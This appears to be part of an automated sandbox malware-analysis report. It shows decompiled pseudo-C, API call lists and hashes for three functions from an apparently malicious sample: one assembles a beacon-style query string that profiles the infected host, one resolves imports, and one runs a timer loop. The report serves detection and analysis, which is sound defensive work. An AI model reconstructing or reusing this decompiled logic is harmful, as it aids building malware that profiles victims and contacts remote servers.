                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 15d10dc9412f208981304d447b95b380e1359a6109971eccbce8539563a6459b
                                                          • Instruction ID: 34f37ce23d9e35990191a50cd072d23328f6153c78824c12f7db114543b2ec14
                                                          • Opcode Fuzzy Hash: 15d10dc9412f208981304d447b95b380e1359a6109971eccbce8539563a6459b
                                                          • Instruction Fuzzy Hash: 7321E971900218BBDF01DFA5CC85ADEBFBDEF48750F208126F905E6120D775AA449BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04954AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04954AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x495d018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x495d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x495d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 = E0495D00C; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x495d2a8; // 0x47a5a8
				_t3 = _t64 + 0x495e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x495d02c,  *0x495d004, _t59);
				_t67 = E049556CD();
				_t68 =  *0x495d2a8; // 0x47a5a8
				_t4 = _t68 + 0x495e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E049558DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x495d2a8; // 0x47a5a8
					_t7 = _t126 + 0x495e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x495d238, 0, _v8);
				}
				_t73 = E0495A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x495d2a8; // 0x47a5a8
					_t11 = _t121 + 0x495e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x495d238, 0, _v8);
				}
				_t146 =  *0x495d32c; // 0x4dd95b0
				_t75 = E04954622(0x495d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x495d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x495d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x495d238, _t152, _v20);
						goto L26;
					}
					E0495518F(GetTickCount());
					_t82 =  *0x495d32c; // 0x4dd95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x495d32c; // 0x4dd95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x495d32c; // 0x4dd95b0
					_t148 = E04951BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x495d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x495c28c);
					_push(_t148);
					_t94 = E0495361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x495d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04959070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04956761();
						L22:
						HeapFree( *0x495d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E049569B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E0495391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E0495A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04955800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0495A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                          0x04954ab6
                                                          0x04954ab6
                                                          0x04954ab6
                                                          0x04954abf
                                                          0x04954ac8
                                                          0x04954aca
                                                          0x04954aca
                                                          0x04954ad7
                                                          0x04954ae2
                                                          0x04954ae5
                                                          0x04954aea
                                                          0x04954af3
                                                          0x04954af6
                                                          0x04954afb
                                                          0x04954afe
                                                          0x04954b03
                                                          0x04954b06
                                                          0x04954b12
                                                          0x04954b1f
                                                          0x04954b21
                                                          0x04954b27
                                                          0x04954b2c
                                                          0x04954b37
                                                          0x04954b39
                                                          0x04954b3c
                                                          0x04954b3e
                                                          0x04954b43
                                                          0x04954b49
                                                          0x04954b4e
                                                          0x04954b51
                                                          0x04954b56
                                                          0x04954b63
                                                          0x04954b65
                                                          0x04954b6b
                                                          0x04954b75
                                                          0x04954b75
                                                          0x04954b77
                                                          0x04954b7c
                                                          0x04954b81
                                                          0x04954b84
                                                          0x04954b89
                                                          0x04954b96
                                                          0x04954b98
                                                          0x04954ba6
                                                          0x04954ba6
                                                          0x04954ba8
                                                          0x04954bb6
                                                          0x04954bbb
                                                          0x04954bbd
                                                          0x04954bc2
                                                          0x04954d83
                                                          0x04954d8d
                                                          0x04954d96
                                                          0x04954bc8
                                                          0x04954bd4
                                                          0x04954bda
                                                          0x04954bdf
                                                          0x04954d77
                                                          0x04954d81
                                                          0x00000000
                                                          0x04954d81
                                                          0x04954beb
                                                          0x04954bf0
                                                          0x04954bf9
                                                          0x04954c0a
                                                          0x04954c0e
                                                          0x04954c17
                                                          0x04954c1d
                                                          0x04954c2c
                                                          0x04954c33
                                                          0x04954c3c
                                                          0x04954c42
                                                          0x04954d6b
                                                          0x04954d75
                                                          0x00000000
                                                          0x04954d75
                                                          0x04954c4e
                                                          0x04954c54
                                                          0x04954c55
                                                          0x04954c5a
                                                          0x04954c5f
                                                          0x04954d61
                                                          0x04954d69
                                                          0x00000000
                                                          0x04954d69
                                                          0x04954c68
                                                          0x04954c6f
                                                          0x04954c77
                                                          0x04954c7c
                                                          0x04954c85
                                                          0x04954c90
                                                          0x04954c95
                                                          0x04954c9a
                                                          0x04954d99
                                                          0x04954d4d
                                                          0x04954d4d
                                                          0x04954d52
                                                          0x04954d5d
                                                          0x04954d5f
                                                          0x00000000
                                                          0x04954d5f
                                                          0x04954ca4
                                                          0x04954ca9
                                                          0x04954cae
                                                          0x04954cb3
                                                          0x04954cbe
                                                          0x04954cc3
                                                          0x04954cc6
                                                          0x04954ccc
                                                          0x04954cd2
                                                          0x04954cd8
                                                          0x04954cdb
                                                          0x04954ce1
                                                          0x04954ce4
                                                          0x04954ce9
                                                          0x04954ced
                                                          0x04954ced
                                                          0x04954cf9
                                                          0x04954d05
                                                          0x04954d09
                                                          0x04954d0b
                                                          0x04954d10
                                                          0x04954d12
                                                          0x04954d17
                                                          0x04954d1c
                                                          0x04954d29
                                                          0x04954d31
                                                          0x04954d34
                                                          0x04954d34
                                                          0x04954d10
                                                          0x00000000
                                                          0x04954cfb
                                                          0x04954cff
                                                          0x04954d36
                                                          0x04954d39
                                                          0x04954d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04954d42
                                                          0x04954d01
                                                          0x00000000
                                                          0x04954d01
                                                          0x04954cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04954ACA
                                                          • wsprintfA.USER32 ref: 04954B1A
                                                          • wsprintfA.USER32 ref: 04954B37
                                                          • wsprintfA.USER32 ref: 04954B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04954B75
                                                          • wsprintfA.USER32 ref: 04954B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04954BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04954BD4
                                                          • GetTickCount.KERNEL32 ref: 04954BE5
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 04954BF9
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 04954C17
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,049520C2,?,04DD95B0), ref: 04951BE1
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(?,?,?,049520C2,?,04DD95B0), ref: 04951BE9
                                                            • Part of subcall function 04951BB6: strcpy.NTDLL ref: 04951C00
                                                            • Part of subcall function 04951BB6: lstrcat.KERNEL32(00000000,?), ref: 04951C0B
                                                            • Part of subcall function 04951BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04951C28
                                                          • StrTrimA.SHLWAPI(00000000,0495C28C,?,04DD95B0), ref: 04954C4E
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(04DD9A78,00000000,00000000,7742C740,049520ED,00000000), ref: 0495362A
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(?), ref: 04953632
                                                            • Part of subcall function 0495361A: lstrcpy.KERNEL32(00000000,04DD9A78), ref: 04953646
                                                            • Part of subcall function 0495361A: lstrcat.KERNEL32(00000000,?), ref: 04953651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04954C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04954C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04954C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04954C8B
                                                            • Part of subcall function 04959070: lstrlen.KERNEL32(?,00000000,04DD9A98,00000000,04958808,04DD9C76,?,?,?,?,?,63699BC3,00000005,0495D00C), ref: 04959077
                                                            • Part of subcall function 04959070: mbstowcs.NTDLL ref: 049590A0
                                                            • Part of subcall function 04959070: memset.NTDLL ref: 049590B2
                                                          • wcstombs.NTDLL ref: 04954D1C
                                                            • Part of subcall function 0495391F: SysAllocString.OLEAUT32(?), ref: 0495395A
                                                            • Part of subcall function 0495391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 049539DD
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04954D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04954D69
                                                          • HeapFree.KERNEL32(00000000,?,?,04DD95B0), ref: 04954D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04954D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04954D8D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: 5fc3702f1e04b32eefc4952a312048494a513da78c1aebae565192c6ea585129
                                                          • Instruction ID: 32613fe97c7a3f7d59ab0120f5317d6b1fb044836181d6eac1f61702f6c69a8d
                                                          • Opcode Fuzzy Hash: 5fc3702f1e04b32eefc4952a312048494a513da78c1aebae565192c6ea585129
                                                          • Instruction Fuzzy Hash: 41913871900208AFDB11EFA4EC48AAE7FB9EF49354F248134E904E7220D739ED51DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E0495AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4950000;
				_t115 = _t139[3] + 0x4950000;
				_t131 = _t139[4] + 0x4950000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4950000;
				_v16 = _t139[5] + 0x4950000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4950002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x495d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x495d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x495d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x495d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x495d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x495d198; // 0x0
										 *_t102 = _t125;
										 *0x495d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x495d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                          0x0495ac64
                                                          0x0495ac7a
                                                          0x0495ac80
                                                          0x0495ac82
                                                          0x0495ac87
                                                          0x0495ac8d
                                                          0x0495ac92
                                                          0x0495ac95
                                                          0x0495aca3
                                                          0x0495acaa
                                                          0x0495acad
                                                          0x0495acb0
                                                          0x0495acb1
                                                          0x0495acb4
                                                          0x0495acb7
                                                          0x0495acba
                                                          0x0495acbf
                                                          0x0495acce
                                                          0x00000000
                                                          0x0495acd4
                                                          0x0495acde
                                                          0x0495ace8
                                                          0x0495aced
                                                          0x0495acef
                                                          0x0495acf9
                                                          0x0495acfc
                                                          0x0495acff
                                                          0x0495ad05
                                                          0x0495ad07
                                                          0x0495ad07
                                                          0x0495ad0a
                                                          0x0495ad0d
                                                          0x0495ad12
                                                          0x0495ad16
                                                          0x0495ad29
                                                          0x0495ad2b
                                                          0x0495add3
                                                          0x0495add3
                                                          0x0495adda
                                                          0x0495addd
                                                          0x0495ade7
                                                          0x0495ade7
                                                          0x0495adeb
                                                          0x0495ae69
                                                          0x0495ae6c
                                                          0x0495ae6e
                                                          0x0495ae6e
                                                          0x0495ae75
                                                          0x0495ae77
                                                          0x0495ae81
                                                          0x0495ae84
                                                          0x0495ae87
                                                          0x0495ae87
                                                          0x00000000
                                                          0x0495aded
                                                          0x0495adf0
                                                          0x0495ae1e
                                                          0x0495ae28
                                                          0x0495ae2c
                                                          0x0495ae34
                                                          0x0495ae37
                                                          0x0495ae3e
                                                          0x0495ae48
                                                          0x0495ae48
                                                          0x0495ae4c
                                                          0x0495ae51
                                                          0x0495ae60
                                                          0x0495ae66
                                                          0x0495ae66
                                                          0x0495ae4c
                                                          0x00000000
                                                          0x0495adf7
                                                          0x0495adfa
                                                          0x0495ae02
                                                          0x0495ae17
                                                          0x0495ae1c
                                                          0x00000000
                                                          0x00000000
                                                          0x0495ae1c
                                                          0x00000000
                                                          0x0495ae02
                                                          0x0495adf0
                                                          0x0495adeb
                                                          0x0495ad31
                                                          0x0495ad38
                                                          0x0495ad48
                                                          0x0495ad4b
                                                          0x0495ad51
                                                          0x0495ad55
                                                          0x0495ad98
                                                          0x0495ada4
                                                          0x0495adcd
                                                          0x0495ada6
                                                          0x0495adaa
                                                          0x0495adb0
                                                          0x0495adb8
                                                          0x0495adba
                                                          0x0495adbd
                                                          0x0495adc3
                                                          0x0495adc5
                                                          0x0495adc5
                                                          0x0495adb8
                                                          0x0495adaa
                                                          0x00000000
                                                          0x0495ada4
                                                          0x0495ad5d
                                                          0x0495ad60
                                                          0x0495ad67
                                                          0x0495ad77
                                                          0x0495ad7a
                                                          0x0495ad8a
                                                          0x00000000
                                                          0x0495ad90
                                                          0x0495ad71
                                                          0x0495ad75
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0495ad75
                                                          0x0495ad42
                                                          0x0495ad46
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0495ad46
                                                          0x0495ad1f
                                                          0x0495ad23
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0495ACCE
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0495AD4B
                                                          • GetLastError.KERNEL32 ref: 0495AD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0495AD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: d15b01c39739daf49c71e8596838b5c012ec2168e7b92fd1be2ab28d1685d1c3
                                                          • Instruction ID: 080aa8efebdcd3a608e8c34dadc99671c529b4a849225901ef3df89eba252958
                                                          • Opcode Fuzzy Hash: d15b01c39739daf49c71e8596838b5c012ec2168e7b92fd1be2ab28d1685d1c3
                                                          • Instruction Fuzzy Hash: 50812B71A00305AFDB14DFA8D884AAEBBF9EF48311F248239E905E7250E7B4E945CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049551B0, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E049551B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x495d240);
					_v20 = 0;
					_v16 = 0;
					L0495AF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x495d26c; // 0x2b4
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x495d24c = 5;
						} else {
							_t68 = E04958D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x495d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E0495A376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E049536B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x495d244);
							goto L21;
						} else {
							__eflags =  *0x495d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04956761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x495d248);
								L21:
								L0495AF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x495d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                          0x049551b0
                                                          0x049551c2
                                                          0x049551c5
                                                          0x049551d1
                                                          0x049551d7
                                                          0x049551dc
                                                          0x04955343
                                                          0x049551e2
                                                          0x049551e2
                                                          0x049551e4
                                                          0x049551e9
                                                          0x049551ea
                                                          0x049551f0
                                                          0x049551f3
                                                          0x049551f6
                                                          0x04955204
                                                          0x0495520f
                                                          0x04955212
                                                          0x04955214
                                                          0x04955221
                                                          0x0495522b
                                                          0x0495522d
                                                          0x04955232
                                                          0x04955237
                                                          0x04955242
                                                          0x04955242
                                                          0x04955239
                                                          0x04955239
                                                          0x04955240
                                                          0x00000000
                                                          0x00000000
                                                          0x04955240
                                                          0x0495524c
                                                          0x00000000
                                                          0x0495524f
                                                          0x04955253
                                                          0x0495525e
                                                          0x0495525e
                                                          0x04955265
                                                          0x0495526e
                                                          0x04955275
                                                          0x0495527e
                                                          0x04955281
                                                          0x04955284
                                                          0x04955289
                                                          0x0495528e
                                                          0x00000000
                                                          0x00000000
                                                          0x04955290
                                                          0x04955293
                                                          0x04955296
                                                          0x04955299
                                                          0x00000000
                                                          0x0495529b
                                                          0x049552aa
                                                          0x049552aa
                                                          0x00000000
                                                          0x049552d8
                                                          0x049552d8
                                                          0x049552dd
                                                          0x049552fc
                                                          0x049552fe
                                                          0x04955303
                                                          0x04955304
                                                          0x00000000
                                                          0x049552df
                                                          0x049552df
                                                          0x049552e5
                                                          0x00000000
                                                          0x049552e7
                                                          0x049552e7
                                                          0x049552ec
                                                          0x049552ee
                                                          0x049552f3
                                                          0x049552f4
                                                          0x0495530a
                                                          0x0495530a
                                                          0x04955312
                                                          0x0495531d
                                                          0x04955320
                                                          0x0495532b
                                                          0x0495532d
                                                          0x04955330
                                                          0x04955332
                                                          0x00000000
                                                          0x04955338
                                                          0x00000000
                                                          0x04955338
                                                          0x04955332
                                                          0x049552e5
                                                          0x00000000
                                                          0x049552dd
                                                          0x049552ad
                                                          0x049552af
                                                          0x049552b2
                                                          0x049552b3
                                                          0x049552b3
                                                          0x049552b7
                                                          0x049552c1
                                                          0x049552c1
                                                          0x049552c7
                                                          0x049552ca
                                                          0x049552ca
                                                          0x049552d0
                                                          0x049552d0
                                                          0x0495534d
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 049551C5
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 049551D1
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049551F6
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04955212
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0495522B
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 049552C1
                                                          • CloseHandle.KERNEL32(?), ref: 049552D0
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0495530A
                                                          • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,04955D5E,?), ref: 04955320
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0495532B
                                                            • Part of subcall function 04958D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04DD9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04958D63
                                                            • Part of subcall function 04958D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04DD93A0,?,00000000,30314549,00000014,004F0053,04DD935C), ref: 04958E00
